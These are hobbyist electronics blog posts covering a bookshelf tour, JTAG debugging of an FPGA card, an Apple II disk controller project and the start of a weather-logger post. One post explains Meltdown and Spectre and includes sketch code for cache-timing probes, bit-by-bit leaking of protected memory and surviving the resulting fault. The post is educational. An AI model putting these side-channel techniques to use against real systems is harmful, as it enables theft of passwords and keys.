
What’s on the BMOW Bookshelf

Over the decades, I’ve pared my collection of books down to just four shelves – only about 100 volumes from a lifetime of reading and studying. Because who needs physical books in an age where everything is available online? The few books that remain in my collection have survived a relentless process of repeated culling, until only the most meaningful and valuable ones remain. Want to take a peek? Here are some selections from the shelves.

Computation Structures, by Ward and Halstead. This was my original digital electronics textbook, covering everything from the transistor to CPU design, and is the only one of my bazillion university textbooks to have survived the cull. This book and MIT’s 6.004 class are what first got me excited about building with electronics. The book is a bit dated now: for something more up-to-date, maybe try Horowitz and Hill instead.

At the end of Computation Structures are schematics and control software for a DIY 8-bit computer called the MAYBE, from which I liberally borrowed ideas for my BMOW 1 computer. I built the MAYBE on a giant breadboard in a suitcase, chip by chip and wire by wire, over a semester-long class.

Practical Electronics for Inventors, by Scherz and Monk. This is a great reference for all those electronics details I should have learned, but didn’t. It puts an emphasis on practical engineering applications, with just enough theory to make sense of it all. When I find myself staring at some Forrest Mims schematic or other inscrutable circuit full of bipolar transistors and passives with unknown purpose, this book is a helpful deciphering aid.

The Black Art of Video Game Console Design, by André LaMothe. Ignore the slightly misleading title. This book is a great how-to guide for designing and building digital electronics projects of all types, with a particular emphasis on microcontroller projects. It covers analog and digital theory, circuit analysis, prototyping techniques, computer architecture, video synthesis, relevant tools, and more. If I could only have a single reference book for all my BMOW projects, this would probably be it.

FPGA Prototyping with Verilog Examples, by Pong P. Chu. For anyone who’s interested in building things with FPGAs or CPLDs, but finds it hard to get past the phase of blinking an LED, check out this book. Verilog can be a difficult language for someone coming from procedural languages like C++. It looks superficially similar, but is actually radically different, with every line of “code” running in parallel. This book goes beyond the Hello World stuff, and provides well-explained examples like a digital stopwatch, a soft UART, PS/2 keyboard I/O, and a memory controller. There’s also a VHDL version of this book by the same author, if you prefer that to Verilog.

Macintosh Repair and Upgrade Secrets, by Larry Pina. This book is the bible for vintage Mac collectors. It’s long out of print, but I managed to snag an old copy from eBay. Does your Mac Plus make a “flupping” sound and refuse to turn on? Got an original Mac 128K with floppy drive problems, or video that’s reduced to a single horizontal line? Larry explains how to fix it, pointing to exactly which components need testing and replacement. These were the good old days when hackers could fix their busted motherboard by replacing transistor Q5 with a Radio Shack soldering iron, instead of making an appointment at the Genius Bar.

The New Apple II User’s Guide, by David Finnigan. Unlike Macintosh Repair and Upgrade Secrets, Finnigan’s Apple II bible was published in 2012 and is therefore relatively up to date. It covers all the common repairs for the Apple II family, as well as lots of reference material for collectors who may not have grown up with an Apple II, or who have forgotten what CALL -151 does. Better still, it also discusses many of the challenges and options for using an Apple II computer in the 21st century. These include how to get your Apple II on the internet, solid state floppy disk alternatives, archiving tools, and the like.

Web Database Applications with PHP and MySQL. This book is essentially “how to build an interactive web site for dummies” using 2004 technology, so it’s dated now, but I still refer to it occasionally. Even for someone with no plans to build a web site, it’s a good introduction to the concepts of how web sites work under the hood. The book describes the ever-popular LAMP stack (Linux, Apache, MySQL, PHP) used to build the front-end and back-end of web applications. Using the skills learned from this book, augmented with more online learning, I’ve built about a dozen different web sites over the years.

Reversing: Secrets of Reverse Engineering, by Eldad Eilam. This is a fascinating look at how software programs are put together, and how they can be pulled apart and modified. I’m not aware of any other books like this one, which makes it that much more entertaining. Reverse engineering sometimes gets a bad reputation, and some people believe it’s only relevant for defeating copy-protection or other morally questionable purposes. The author introduces other uses, such as dissecting and analyzing malware, or understanding software that lacks source code and documentation. For anyone who enjoyed my post about what happens before main(), or my quest to create the smallest possible Windows executable, I recommend checking out this book.

Compute! Magazine, January 1985. This is the only remaining example of my once-mighty collection of computer magazines. There’s no special significance to this particular issue, other than that it was the only one to escape the recycling bin. It’s always amusing to browse. Loading software from cassette tape? Compuserve ads? And who didn’t love typing in those 20-page long BASIC program listings?

Flatland, by Edwin A. Abbott. This classic 1884 science fiction “romance of many dimensions” will blow your mind in just 92 pages. Imagine you’re a three-dimensional being attempting to explain things to inhabitants of Flatland, a 2D world. Imagine those Flatlanders attempting to explain their world to the miserable inhabitants of 1D Lineland. Now ponder the implications for our own three-dimensional existence: is it any more real than Flatland or Lineland? Where are the 4D visitors to Earth, and what might they look like? It’s a fantastic thought experiment, and the side-plot satire of Victorian society values is a hilarious bonus.

The Monopoly Companion, by Philip Orbanes. If you thought Monopoly was just a silly game for kids, you’re wrong. Back in my university days, my group of friends played many hundreds of Monopoly rounds, arguing strenuously over trading and strategy. A good friend was the Massachusetts champion one year, and represented the state at the National Monopoly Championships held in Atlantic City. The book describes general strategies like a preference for certain color groups (orange is best), and the importance of building to the three house level. We created a detailed software simulation accounting for all board squares, rents, cards, and dice roll probabilities, and ran it millions of times to determine the best strategy. Then we sent a letter to this book’s author, disputing some of his conclusions. God, what a bunch of nerds we were.

Your Money or Your Life, by Dominguez and Robin. We all spend a tremendous amount of time and energy in the attempt to accumulate money, sometimes without really considering why. Yes we need a safe place to live, food to eat, and other necessities – but what then? The money itself won’t bring happiness. Have we really thought about exactly what will bring happiness? How much of our life’s energy are we willing to trade away for those things? Having identified them, might there be other ways to get similar things that require less or no money? Can money even buy them at all? Your Money or Your Life helps guide readers towards a future where they may not be rich in dollars, but are rich in the things they value most.

Finding Your Own North Star, by Martha Beck. Where are we headed? Why? What’s important to our essential self? Like other self-help books or the time-honored What Color is Your Parachute, this book aims to help identify paths that are best-aligned with one’s values. It resonated with me in a way that other similar books didn’t. One clever exercise was to get everybody on your side, by intentionally redefining who “everyone” is. Another was an invitation to envision the best possible personal future imaginable, and map it out. The act of defining a goal already brings it closer.

The Goldfinch, by Donna Tartt. A friend and I read this Pulitzer Prize winning novel at the same time. She thought it was just OK. I thought it was outstanding. It was one of those books that when you finish, you set it gently in your lap and just stare vacantly into space for a long while, trying to digest it all. Tartt’s prose is rich and evocative like a master painting, and her story of loss and disaffection is heartbreaking. But what really moved me was the portrayal of the awkward intimacy of adolescent male friendships, the things said and unsaid but understood, the struggle to carry those relationships into adulthood. I felt Tartt had snooped inside my mind and extracted feelings I didn’t even know were there.

A family bible from 1817. Not many artifacts survived the past two centuries with my family, but this one did. It’s a huge volume with an imposing leather cover, and on the inside leaf are inscribed the births and deaths of generations.

“Joshua Ladd was born 1st mo. 7 1817”. That’s January 7 to us, so Joshua just had his 201st birthday recently. He was my great-great-great-great-grandfather, a farmer originally from Virginia who at age 14 moved to Ohio with his mother and siblings after the death of their father. Ohio had just become a state, and the family moved in search of new opportunities. Joshua opened a grocery and supply store in the town of Westville, near Damascus OH. I still have the wedding gloves of Joshua’s daughter Sarah tucked safely in a box. Any Ladds in your family tree? Maybe we’re related.

Essays by Ralph Waldo Emerson. This particular volume is from 1883, and was passed down through generations to my father and then me. Sometimes I think those Transcendentalist authors like Emerson, Longfellow, and Thoreau had everything figured out in 1870, and we haven’t accomplished much since. “When you were born you were crying and everyone else was smiling. Live your life so at the end, you’re the one who is smiling and everyone else is crying.”


Yellowstone JTAG Debugging

After a month of inactivity, I finally returned to my unfinished Yellowstone disk controller project to investigate the JTAG programming problems. Yellowstone is an FPGA-based disk controller card for the Apple II family that aims to emulate a Liron disk controller or other models of vintage disk controller. It’s still a work in progress.

Last month I discovered some JTAG problems. With the Yellowstone card naked on my desk, and powered from an external 5V supply, JTAG programming works fine. I can program the FPGA to blink an on-board LED. And when I insert the already-programmed card into my Apple IIe and power it from the slot, it works – the LED blinks. But if I try to do JTAG programming while the card is inserted in the IIe, it always fails with a communication error. I’ve run through several theories why:

  • It might be some kind of noise or poor signal integrity on the JTAG traces. But the traces are quite short and don’t cross any other signal traces that might carry interfering signals.
  • Maybe I have power problems, and the IIe’s 5V supply is drooping briefly when I try to program the FPGA via JTAG. But I measured the 5V and 3.3V supply voltages during JTAG programming, and they look fine.
  • There might be a ground loop, due to the Apple IIe and JTAG programming having different ground potentials. But I measured the difference in grounds, and it’s only 4.3 millivolts.

To help solve this mystery, I used the analog mode of my Saleae Logic Pro 8 logic analyzer. In analog mode, it functions like a simple 8-channel 12.5 MS/sec oscilloscope. I recorded the 3.3V supply for the FPGA, as well as all the JTAG signals. First, here’s what the first three seconds of JTAG traffic look like when programmed externally:

There’s about 1 second of preamble communication, and the rest is the FPGA configuration data arriving at high speed. The 3.3V supply for the FPGA remains at about 3.28V through the whole process. The JTAG signals TMS, TDI, and TDO span the voltage range from 0.17V to 3.2V, which seems fine. But the TCK signal never goes higher than 1.86V. Uh oh, what’s happening there? Let’s zoom in a little:

Zooming in, things are even worse than they appeared initially. TCK never climbs above 1.86V, but many TCK pulses only get half that high, stopping at 0.97V. TMS and TDI show some runts too. Zooming in even further on one of the problem areas:

Here you can see a couple of the 1.86V TCK pulses, followed by a whole mess of the runtier 0.97V pulses. Ugh. These should all be using the full range 0 to 3.3V, or something close to it. With a clock signal this bad, it’s amazing the JTAG programming still works.

Do these graphs really reflect what’s happening? I’m a little suspicious that I’m running into limitations of the Saleae Logic Pro 8’s analog mode. At 12.5 MS/sec, it’s taking one analog sample every 0.08 microseconds or 80 nanoseconds. That’s pretty poor as scopes go, but the period of the JTAG clock is slow: about 1 microsecond (1 MHz operation). There should be 12.5 samples per clock period, more than enough to get a decent reading for the min and max voltage of each clock period. Therefore I think the graphs are accurate.

My conclusion is that although external JTAG programming succeeds, the JTAG signals look terrible. The fact that JTAG programming fails when the card is in the Apple IIe slot likely has little to do with the IIe, and everything to do with some other basic signal quality problem.

Next I put the Yellowstone card into the Apple IIe, and repeated my test. Here’s the first three seconds of JTAG traffic again:

There’s a short bit of preamble communication, then nothing. Something must go wrong at the beginning, and the rest of the communication is aborted. The voltage levels all look about the same as when programming externally. The 3.3V supply is about 3.28V, TCK never goes higher than 1.86V, but the other JTAG signals use the full voltage range. Zooming in, we observe the same extra-runty TCK pulses as with external JTAG programming:

It’s not obvious to me why external JTAG programming succeeds, but programming in the Apple IIe slot fails. Both cases look equally bad. The only real difference I noticed is the TDO signal. In the case of external programming, the TDO high voltage is very steady at about 3.268 volts, and never varies by more than 0.01V. It also drops low at many points during the JTAG communication. But in the case of in-slot programming, the TDO signal is always high and the voltage is noisier. It’s a subtle difference, but you can see the minor noise here:

The TDO high voltage ranges from 3.187V to 3.314V, so it’s about 10x noisier than during external programming. It’s still within an acceptable range though, so maybe this isn’t important.

 
Finding the Culprit

Now that I know I have poor quality JTAG signals, where do I look for the cause? Poor quality JTAG programmer? Bad PCB design? Here’s a section of the PCB, showing the path of the JTAG signals from the connector to the FPGA:

There’s not much opportunity for interference. The only PCB tracks that are crossed by the JTAG signals are voltage supplies and the disk I/O signals, which were unconnected during this test.

The prime suspect is R3, a 4.7K pulldown resistor on TCK. This was recommended by Lattice, as a precaution to prevent spurious TCK pulses from causing unwanted JTAG activity when no JTAG programmer is present. Lattice technote TN1208 for the MachXO2 family says on page 12-2 “TCK: Recommended 4.7kOhm pull down.” The other JTAG signals discussed here all have internal pull-ups. 4.7K isn’t much, but maybe the JTAG programmer has an anemic drive strength and is unable to drive TCK fully to 3.3V with the pulldown present? I could try removing R3, but that wouldn’t explain why there are also some runt pulses seen on TMS and TDI. I double-checked to confirm I didn’t accidentally use the wrong value resistor for R3, but no: it’s 4.7K as intended. I also measured the resistance between TCK and GND, to see if there’s some other unintended low-resistance path to GND that’s screwing up everything, but it measured 4.7K exactly.
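
As a rough sanity check on that theory, I can treat the programmer’s output as a simple resistive source driving R3 and ask what source resistance would explain a 1.86V high level. This is only a crude DC approximation of my own, not a real model of the driver, but the arithmetic is quick:

#include <stdio.h>

int main(void) {
    const double v_drive = 3.3;       // assumed programmer output level, volts
    const double v_measured = 1.86;   // observed TCK high level, volts
    const double r_pulldown = 4700.0; // R3 on TCK, ohms

    // If TCK high = v_drive * r_pulldown / (r_pulldown + r_source), then the
    // source resistance needed to explain 1.86V is:
    double r_source = r_pulldown * (v_drive / v_measured - 1.0);
    printf("Implied programmer output resistance: %.0f ohms\n", r_source);  // about 3600
    return 0;
}

A few kilohms of effective output resistance would be remarkably weak for a push-pull JTAG driver, which is another hint that R3 by itself probably isn’t the whole story.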


Meltdown and Spectre Vulnerabilities Explained

This week brought some fascinating news for CPU nerds: the revelation of security vulnerabilities in the basic hardware architecture of many modern processors. The Meltdown and Spectre vulnerabilities affect virtually all modern computers, according to a sensationalist headline at The Register which called them the “worst ever” CPU bugs. Unlike bugs in a specific software program or operating system that can be fixed with a patch, these are fundamental flaws in the very design of the CPU.

What are these vulnerabilities exactly, how do they work, and how are Meltdown and Spectre different from each other? I must have read twenty different news stories without finding a clear answer. The best I could get was that these vulnerabilities somehow involve the CPU’s use of speculative execution: an optimization trick that executes code before it’s known whether the code should really be executed, discarding the results if it’s later determined that the code wasn’t needed. But as a guy who designs custom CPUs as a hobby, I needed a better answer than that. So I started poking beyond the news headlines into the gory tech details.

What follows below is my attempt to explain Meltdown and Spectre to myself, and by extension to readers of this blog. It assumes readers already have some basic knowledge of concepts like CPU internals, caches, and operating systems. But more so than normal for this blog, I’ll be discussing details that I don’t fully understand myself, and my explanations may be flawed. If you find an error or omission, kindly post a comment and let me know.

 
Speculative Execution + Caching = Vulnerability

Both Meltdown and Spectre exploit the fact that speculatively executed code can modify the CPU cache. Even if the code is never “really” executed, meaning that it never modifies CPU registers or memory or other processor state, the cache effects of the speculatively executed code can be observed by cleverly-constructed code that follows it, by testing what is and isn’t cached. Consider this example, taken from Google’s Project Zero Blog:

struct array {
  unsigned long length;
  unsigned char data[];
};

struct array *arr1 = ...;
unsigned long untrusted_offset_from_caller = ...;

if (untrusted_offset_from_caller < arr1->length) {
  unsigned char value = arr1->data[untrusted_offset_from_caller];
  ...
}

If arr1->length is not presently in the cache, the CPU won’t immediately know whether the if clause will evaluate true or false. If it guesses true, then the if body will execute speculatively while arr1->length is fetched from main memory. Speculative execution will cause arr1->data[untrusted_offset_from_caller] to be loaded from main memory into the cache. This behavior can be leveraged in several different ways (see below) to gain information about protected regions of memory that are supposed to be private: memory owned by other processes or the kernel. The ability to observe protected memory makes it possible to read passwords, Bitcoin keys, emails, or other sensitive information.
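
To make that “testing what is and isn’t cached” step concrete, here’s a rough sketch of the kind of timing probe the attacker’s follow-up code can use. It’s my own illustration rather than anything from the Project Zero post, it assumes an x86 machine with GCC or Clang, and a real attack still has to calibrate a cycle-count threshold against known-cached and known-uncached loads:

#include <stdint.h>
#include <x86intrin.h>  // __rdtscp, _mm_clflush, _mm_lfence, _mm_mfence (GCC/Clang on x86)

// Roughly how many cycles does it take to load one byte from addr?
// A small result means the cache line was already present.
uint64_t time_load(const volatile uint8_t *addr) {
    unsigned int aux;
    _mm_lfence();                     // keep earlier work out of the timed window
    uint64_t start = __rdtscp(&aux);
    uint8_t value = *addr;            // the load being timed (volatile, so it isn't optimized away)
    (void)value;
    uint64_t end = __rdtscp(&aux);
    _mm_lfence();
    return end - start;
}

// Flush a probe address out of the cache before triggering the victim code,
// so that only a speculative access can bring it back in.
void flush_line(const volatile void *addr) {
    _mm_clflush((const void *)addr);
    _mm_mfence();
}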

 
Spectre: Speculative Execution in Branch Prediction

The Spectre vulnerability requires getting the victim (the kernel or another process) to run specially-constructed code, which then leaks information through the cache effects of speculative execution. Consider an expanded version of the previous example.

struct array {
  unsigned long length;
  unsigned char data[];
};

struct array *arr1 = ...; /* small array */
struct array *arr2 = ...; /* array of size 0x400 */
unsigned long untrusted_offset_from_caller = ...;

if (untrusted_offset_from_caller < arr1->length) {
  unsigned char value = arr1->data[untrusted_offset_from_caller];
  unsigned long index2 = ((value&1)*0x100)+0x200;
  if (index2 < arr2->length) {
    unsigned char value2 = arr2->data[index2];
  }
}

If arr1->length is not currently in the cache, speculative execution will continue inside the body of the if clause. Either arr2->data[0x200] or arr2->data[0x300] will be fetched from main memory and cached, depending on the least significant bit of arr1->data[untrusted_offset_from_caller]. After the speculative execution has ended, the attacking user mode code can measure how much time is required to load arr2->data[0x200] and arr2->data[0x300]. Whichever one was cached will load faster, revealing whether the LSB of arr1->data[untrusted_offset_from_caller] is 0 or 1. By repeating this process with other bit masks, the attacker can eventually read all of arr1->data[untrusted_offset_from_caller]. And by the choice of untrusted_offset_from_caller, the attacker can read any memory location.
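
Putting that together with a timing probe like the one sketched earlier, the attacker’s outer loop would look roughly like this. To be clear, run_victim_gadget() is a hypothetical stand-in for whatever mechanism re-runs the bounds-checked victim code with a chosen offset and bit mask (an eBPF program, in the kernel attack described below), and time_load() and flush_line() are the helpers from the previous sketch:

#include <stdint.h>

// Helpers from the earlier timing-probe sketch.
uint64_t time_load(const volatile uint8_t *addr);
void flush_line(const volatile void *addr);

// Hypothetical: ask the victim to run the bounds-checked code above with the given
// offset, testing the given bit of the out-of-bounds byte before indexing arr2.
void run_victim_gadget(unsigned long untrusted_offset, int bit);

// Recover one byte of protected memory, one bit at a time.
uint8_t recover_byte(const volatile uint8_t *arr2_data, unsigned long untrusted_offset) {
    uint8_t result = 0;
    for (int bit = 0; bit < 8; bit++) {
        flush_line(arr2_data + 0x200);                 // neither probe line starts out cached
        flush_line(arr2_data + 0x300);
        run_victim_gadget(untrusted_offset, bit);      // speculatively touches 0x200 or 0x300
        uint64_t t0 = time_load(arr2_data + 0x200);
        uint64_t t1 = time_load(arr2_data + 0x300);
        if (t1 < t0)                                   // 0x300 came back cached: the bit was 1
            result |= (uint8_t)(1u << bit);
    }
    return result;
}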

That’s the general idea. Some implementation details and optimization methods are described in the Project Zero blog. The blog also describes another Spectre variant exploiting speculative execution through indirect branches, which I didn’t examine.

How can a user process get the kernel to run this kind of specially-constructed code? It turns out that the Linux kernel has a feature called eBPF that’s designed for this exact purpose, presumably to allow for device drivers or socket filters or other snippets of user-provided code that need to run in the kernel. I’m assuming Windows and Mac OS have something similar. Since running arbitrary user-provided code in the kernel would be a huge security vulnerability itself, eBPF actually runs the code in an interpreter or a JIT engine. But that’s enough to exploit this vulnerability.

Note: after writing this post, I found a second explanation of Spectre from a group of academic researchers working independently from Google Project Zero. Their paper describes Spectre slightly differently, and discusses attacking other processes rather than the kernel. It also includes a proof of concept Javascript attack, in which a malicious bit of Javascript is able to read private memory from the web browser process. Relying on the fact that Javascript is typically JIT compiled to native code, and using debug tools to examine the native output, the authors were able to iteratively tweak the Javascript source code until it produced native code containing an exploitable conditional branch of the kind shown above.

Spectre affects essentially all modern CPUs (Intel, AMD, ARM, and others), given the proper conditions.

 
Meltdown: Exploiting Out of Order Execution

Meltdown is similar to Spectre, in that they both leak information through the cache from instructions that were never “really” executed. However, with Meltdown there’s no branching involved. The attack relies on the way modern CPUs optimize performance by employing out of order instruction execution. Depending on the availability of CPU execution units and operand data, instructions are sometimes executed in a different order than they appear in a program, but they are retired (registers and state are updated) in order. The fact that they were executed out of order should be invisible to the program, but Meltdown shows that’s not always true. The details are described at cyber.wtf and in a separate academic paper.

When instructions are executed out of order, but aren’t yet retired, their results exist in a kind of limbo that’s very similar to speculatively executed code from branch prediction. However, it’s not clear whether this should properly be called speculative execution. The Meltdown paper refers to these as “transient instructions”, which seems like a good term.

Consider this code:

mov rax, [someKernelAddress]           ; transient read of protected kernel memory (faults when retired)
and rax, 1                             ; isolate one bit of the secret value
mov rbx, [rax+someUserModeAddress]     ; touch one of two nearby user-space addresses, selected by that bit

The first instruction should cause an exception if executed from a user mode process, because it’s an attempt to access kernel memory. However, at least on Intel architectures, it appears that the exception doesn’t occur until the instruction is actually retired. If this code is executing as part of a transient instruction sequence, no exception will yet occur, the privilege violation (bypassing kernel memory protection) will be ignored, and the transient read will succeed. The following transient instructions that use the read value will also succeed, and will affect the cache state in the same way as Spectre, creating a side-channel for leaking information about kernel memory.

Eventually, the first instruction will be retired and the exception will occur. The state changes related to the following instructions will be discarded, because those instructions were never really executed, but their cache side effects will remain. After an exception handler resolves the exception, further code can measure how long it takes to load from address someUserModeAddress vs someUserModeAddress+1 (a real exploit would scale the bit by at least a cache line size, so the two probe addresses land on different cache lines), thereby inferring the LSB of the value stored at someKernelAddress. Further iterations can read the other bits.
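
One practical wrinkle: in the non-speculative world, that first instruction kills the attacking process with a segmentation fault. Here’s a hedged sketch of one way user code can survive the fault and continue on to the timing measurement, using an ordinary POSIX signal handler (the Meltdown paper also discusses suppressing the fault entirely, for example with Intel TSX):

#include <setjmp.h>
#include <signal.h>

static sigjmp_buf after_fault;

static void on_segv(int sig) {
    (void)sig;
    siglongjmp(after_fault, 1);       // bail out of the faulting code path
}

void attempt_transient_read(void) {
    signal(SIGSEGV, on_segv);
    if (sigsetjmp(after_fault, 1) == 0) {
        // Run the filler instructions plus the transient sequence shown above.
        // The kernel read faults when it retires, SIGSEGV fires, and we land below.
    } else {
        // Fault handled. Now time the loads of the two candidate user-mode
        // addresses to see which cache line the transient instructions touched.
    }
}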

To ensure that the Meltdown code sequence executes as an out-of-order transient sequence, the cyber.wtf technique includes a long series of filler instructions ahead of it. These filler instructions all use a different execution unit than the units needed by the Meltdown sequence, and create a long chain of interdependent instructions. So the CPU must sequentially execute the filler instructions one at a time, but meanwhile it can also jump ahead and execute the Meltdown instructions out of order.

Note that “out of order” here refers to the Meltdown code being executed out of order relative to the filler instructions. The Meltdown instructions themselves are executed in order relative to each other, since each one is dependent on the previous one.

At this time, Meltdown appears to be limited to Intel CPUs only. It’s uncertain whether this is due to a fundamental difference in how Intel handles memory protection with respect to out-of-order execution, or is simply due to differences in the size of the reorder buffer between CPU vendors. In a short aside on Meltdown, the Spectre paper states “Meltdown exploits a privilege escalation vulnerability specific to Intel processors, due to which speculatively executed instructions can bypass memory protection.” However, the Meltdown paper reports that the authors were able to observe bypassing of memory protection during out of order execution on ARM and AMD processors too, but were unable to construct a working exploit.

 
Impact and Mitigation

Both of these vulnerabilities are very bad, enabling user mode code to read other protected memory. However, they’re both local exploits: the attacking code must be running on the machine being attacked, so an attacker must somehow get their code onto your machine first. For this reason, the greatest risk is probably to cloud computing environments, where processes from many different people are running on the same machine, supposedly isolated from one another thanks to memory protection. But there’s also a risk in any situation where one computer runs code received from another, even inside a VM or sandbox.

It’s not clear how Spectre can be fixed in software, because it relies on CPU features that are fundamental to all modern processors. In fact, I don’t think it can be fixed in software – at least not in any general way. One web site says, “as Spectre is not easy to fix, it will haunt us for a long time.” The only good news is that convincing the kernel to run an attacker’s special code with eBPF or other methods isn’t easy. And web browsers can be patched to protect against the sort of Javascript Spectre attacks described in the research paper. But other opportunities for Spectre attacks will remain. Future CPUs may contain hardware fixes for Spectre, but they’ll likely come with a complexity and performance penalty. Maybe cache lines will have to be treated as process-specific data instead of as shared resources.

Meltdown is the more serious of these two vulnerabilities, because it happens entirely in a single user space program and doesn’t require any special code in the victim process or kernel. In the real world, this makes it much easier for an attacker to exploit. Fortunately Meltdown can be fixed at the operating system level, but the fix carries a performance penalty that may be as high as 30%.

In the Meltdown sample code, readers may have wondered how an instruction like mov rax, [someKernelAddress] could possibly work in user mode code, even speculatively, since the kernel uses a different virtual to physical address mapping than the user mode process. It turns out that Linux (and I assume other operating systems too) maps the kernel’s memory into the address space of every user process, for performance reasons. By keeping the kernel permanently mapped, there’s no need to flush the TLB when switching between user and kernel space, and TLB entries for kernel space never need to be flushed. The processor’s MMU can normally be trusted to prevent user processes from accessing this kernel memory – except in the case we’ve just seen. The details are nicely explained in the description of a related technology named KAISER.

The “fix” is KPTI: kernel page table isolation. This ends the longstanding practice of mapping kernel memory into the address space of user processes. This ensures that mov rax, [someKernelAddress] won’t be able to reveal any information. However, it means that the TLB must be flushed every time there’s a switch between user and kernel code. If a user process makes frequent kernel calls, the constant TLB flushing will be expensive and have a significant negative performance impact.

 
The Future

Meltdown and Spectre are scary, not only because of what they can do themselves, but because they introduce a Pandora’s Box of new vulnerability types we’re sure to see more of in the future. We can no longer think about security analysis as something that gets applied to specific software programs or operating systems, examining the code and imagining it being executed instruction by instruction in an abstract environment. We must now consider the specific highly complex CPU (often not fully documented) that runs this software, and understand the many subtle ways in which the true hardware behavior differs from the instruction-by-instruction conceptual model.

The KAISER document mentions techniques like exploiting timing differences in fault handling, observing the behavior of prefetch instructions, and forcing faults using the Intel TSX (transactional memory) instructions. This will be a new frontier for most developers, forcing them to peel back a layer of abstraction when evaluating future computer security issues. The world just got a lot more complicated.


FPGA-Based Disk Controller for Apple II

Apple II disk controller cards are weird, there are a crazy number of different types, and many are rare and expensive. Can an FPGA-based solution save the day for retro collectors? You bet! Nearly all the existing disk controllers connect the same 8-bit bus to the same 19-pin disk interface, so a universal clone is merely a question of replacing the vintage 80s guts of the card with a modern reprogrammable FPGA. This hypothetical universal controller card could connect to almost any Apple II disk drive, or a Floppy Emu. Here’s my first attempt.

 
An Idea Takes Root

This project has been nearly finished since August, but I’d hoped to delay announcing it until it was 100% done. Back in July there was a surge of interest in the Liron disk controller, when I updated the Floppy Emu firmware to add Liron support. For the first time, it was now possible to emulate a 32 MB Smartport disk on an Apple II, II+, or IIe with the Floppy Emu. But only Liron card owners could benefit, and the Liron card is fairly obscure and difficult to find. People started asking about the possibility of a Liron clone card, so I went to work.

Mapping out the complete schematic of the Liron took a couple of days. It’s a single IWM (the famous Integrated Woz Machine), combined with a small number of standard 7400-series logic chips, and a ROM to hold the boot code. Writing Verilog code for the FPGA to duplicate the 7400 chips’ functions was easy. Creating a Verilog reimplementation of the IWM was harder, but with the aid of the IWM spec and a logic analyzer I got it done. By selecting a moderately roomy FPGA, I was able to incorporate the boot ROM functionality too, so no actual ROM chips are needed. The entire design boiled down to some 3.3V level converters and a single FPGA, with a bunch of connectors and passive components. I realized the design wasn’t limited to being a Liron clone, but could also probably be a Disk 5.25 or Disk 3.5 controller with just a change of firmware. Maybe even a UDC controller. Ooh, the possibilities!

 
Hardware

I worked like mad to finish the design in late July, just before a trip to Yellowstone National Park, which gave this project its codename. The core of the prototype board is a Lattice MachXO2 FPGA, specifically the LCMXO2-1200HC. This 100-pin bad boy has 1280 LUTs for implementing logic, and 8 KB of embedded block RAM to serve as the boot ROM or for other functions. It also has some nice features like a built-in PLL oscillator and integrated programmable pull-up and pull-down resistors. Unlike some FPGAs, the MachXO2 family also has built-in flash memory to store the FPGA configuration, so it doesn’t need to be reloaded from an external source at power-up. The FPGA can be programmed through a JTAG header on the card.

The external disk is connected to the card with a standard 20-pin ribbon cable, just like what you’d find inside an Apple IIc, or on the Floppy Emu. In fact for the Floppy Emu, you can connect a 20-pin ribbon cable directly from the Emu to the FPGA card, with no DB-19 required. For other external disk drives, I built a small adapter that converts a short length of 20-pin ribbon cable to a DB-19 female connector.

Because the FPGA’s maximum supported I/O voltage is 3.3V, but the Apple II has a 5V bus, some level conversion is needed. I used four 74LVC245 chips as bus drivers. These chips operate at 3.3V but are fully 5V tolerant, and the Apple II happily accepts their 3.3V output as a valid logic “high”. One of the chips operates bidirectionally on the data bus, and the others handle the unidirectional address bus and control signals.

There’s a tiny 3.3V voltage regulator on the board, which you can see at the lower-right at U3. It’s barely any bigger than an 0805-size SMD capacitor. Even with these small components, I was still able to solder the entire prototype board myself by hand.

Just for grins I added a 2 MB serial EEPROM to the board, which you can see at U2. 2 MB is enough to store 14 disk images of 5.25 inch disks, or a single larger disk image. It’s not central to the design, but if it works then the card could function as an all-in-one virtual disk like the CFFA3000, in addition to functioning as a disk controller for external drives. More options!

 
Status

Here comes the embarrassing part. After July’s spurt of activity, the PCBs and parts arrived in the mail. And then I did…. nothing. Finally in October I assembled one prototype board, stuck it in my Apple IIe, and played with it for a bit. But since that day I’ve done…. nothing. I’m struggling with some internal dilemma about the balance between a hobby and a business, and doing things because I want to or because I think I should want to. I’m hoping that by publishing this summary, I may spur myself into further action.

The prototype board works as far as I’ve tested it, but that’s not very far. I verified that I can program the FPGA via JTAG, and that it responds to address and data on the Apple II bus, but that’s about it. I haven’t yet looked at what it’s doing on the external disk interface, or tried connecting a real drive. My attention has just been focused on other things, and even though I always mean to return to this project “soon”, somehow I never do.

There’s at least one serious bug with JTAG programming that needs to be addressed. When the board is outside the Apple IIe and powered from a separate 5V supply, JTAG programming works fine. But when the board is actually inserted in the IIe and powered from the slot, JTAG programming doesn’t work. It always fails with a communication error. I thought this might be some kind of noise or poor signal integrity on the JTAG traces when the board is in the IIe, but the traces are quite short and don’t cross any other signal traces that might carry interfering signals. I also thought maybe I had power problems, and the IIe’s 5V supply was drooping briefly when I tried to program the FPGA via JTAG. But as far as I can tell with a logic analyzer’s analog functions, the 5V and 3.3V supplies remain stable. It’s a mystery that will require some better tools and more careful testing.

 
Next Steps

What’s next for this FPGA disk controller, assuming I ever finish it? Will it become a new product in the BMOW store? That was certainly my original plan, although my lack of motivation these past months has cast some doubt on that idea. I want to keep fun hobbies fun, and not have them become an obligation and a chore, which I fear is already happening with the other retro computer gizmos I’ve developed in the past few years. We’ll see how it plays out.

Assuming this eventually becomes a new product, how will users reprogram the FPGA in order to clone a different type of disk controller? It’s not reasonable to expect that everyone will own a stand-alone JTAG programmer and know how to use it. Unfortunately I can’t see any alternative solution that wouldn’t require extra hardware and complexity, and push up the cost of the board. I might add a microcontroller and an SD card socket for loading alternate firmware, but that would be a fairly ridiculous amount of extra baggage if it were used only for JTAG. Perhaps the Apple II itself could be used as a JTAG programmer, with some extra hardware that optionally bridged the data bus to the JTAG interface? Sounds complicated, and it would leave the question of how to get the firmware onto the Apple II first. Or maybe the user could choose between a few different built-in firmwares using a switch, but would be unable to load new ones? That sounds more plausible, but would mean a bug in the firmware couldn’t be easily fixed.

Fortunately those questions can wait. The first priority is to finish debugging the prototype, connect it to some real disk drives, and verify that it works. Maybe by Christmas…


Weather Logger with Losant and Amazon Alexa

Like a million other people on the Internet, I’ve been experimenting with home weather logging. I roll my eyes at the phrase “Internet of Things”, but it’s hard to deny the potential of cheap networked sensors and switches, and a weather logging system is like this field’s Hello World application. Back in June I posted about my initial experiments in ESP8266 weather logging. Since then I’ve finalized the hardware setup, installed multiple nodes around the house, organized a nice web page to analyze all the data, and integrated everything with Amazon Alexa. Time for an update.

Hardware

